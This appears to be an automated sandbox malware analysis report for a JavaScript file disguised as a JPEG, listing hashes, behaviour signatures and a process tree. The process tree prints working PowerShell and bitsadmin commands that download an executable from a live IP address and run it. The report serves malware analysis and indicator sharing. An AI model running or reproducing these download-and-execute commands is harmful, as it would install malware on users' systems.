Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    25-08-2024 16:40

General

  • Target

    PIC176174.jpg.js

  • Size

    650B

  • MD5

    a7ab035cbabbaa850b95e1eb8c877789

  • SHA1

    1175c71d4e70591c3816292fd9107486a7fb3bbe

  • SHA256

    a84be445b2a8be5ed37e7d23816293f15ba5acec72fde6e77d59db4832eace48

  • SHA512

    7189b836a35309cc29acadfb3ed9bb915db1adb47780b70c1ec44ab308d46eaebdc1ab1fae7a460d437f47fef781c0a4d7d9c4e025f7de6e0952b21d792c1854

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://217.8.117.63/tspam.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2364
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe
        3⤵
        • Download via BitsAdmin
        PID:760

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2364-4-0x000000001B470000-0x000000001B752000-memory.dmp

    Filesize

    2.9MB

  • memory/2364-5-0x0000000002A70000-0x0000000002A78000-memory.dmp

    Filesize

    32KB